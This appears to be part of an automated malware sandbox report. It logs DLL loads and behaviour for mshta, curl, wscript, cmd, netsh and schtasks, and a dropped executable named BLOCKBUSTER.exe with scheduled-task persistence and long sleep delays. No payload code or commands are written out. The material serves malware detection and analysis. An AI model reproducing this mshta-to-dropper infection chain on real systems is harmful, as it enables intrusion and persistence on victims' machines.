    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: schannel.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: mskeyprotect.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\curl.exeSection loaded: ncryptsslp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: zipfldr.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.fileexplorer.common.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: shdocvw.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: linkinfo.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntshrui.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cscapi.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: apphelp.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: version.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: mpr.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wininet.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wsock32.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: winmm.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: uxtheme.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: devobj.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: msasn1.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: c_is2022.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: c_g18030.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: c_gsm7.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: c_iscii.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: netapi32.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: netutils.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: olepro32.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: msimg32.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: kernel.appcore.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: windows.storage.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wldp.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: unrar.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: 7zxa.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: winhttp.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: shfolder.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: magnification.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: urlmon.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: iphlpapi.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: iertutil.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: srvcli.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wtsapi32.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: d3d9.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: dwmapi.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: security.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: secur32.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: sspicli.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: winsta.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wkscli.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: cscapi.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: oleacc.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: textshaping.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: mlang.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: textinputframework.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: coreuicomponents.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: coremessaging.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: ntmarta.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wintypes.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wintypes.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: wintypes.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: propsys.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: profapi.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: edputil.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: appresolver.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: bcp47langs.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: slc.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: userenv.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: sppc.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\_6720bdf2272bc\7zxa.dllJump to dropped file
    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\_6720bdf2272bc\unrar.dllJump to dropped file
    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\_6720bdf2272bc\BLOCKBUSTER.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeWindow / User API: threadDelayed 1444
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep count: 1444 > 30
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1732800000s >= -30000s
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe TID: 7144Thread sleep time: -1200000s >= -30000s
    Source: C:\Windows\SysWOW64\wscript.exeFile Volume queried: C:\ FullSizeInformation
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
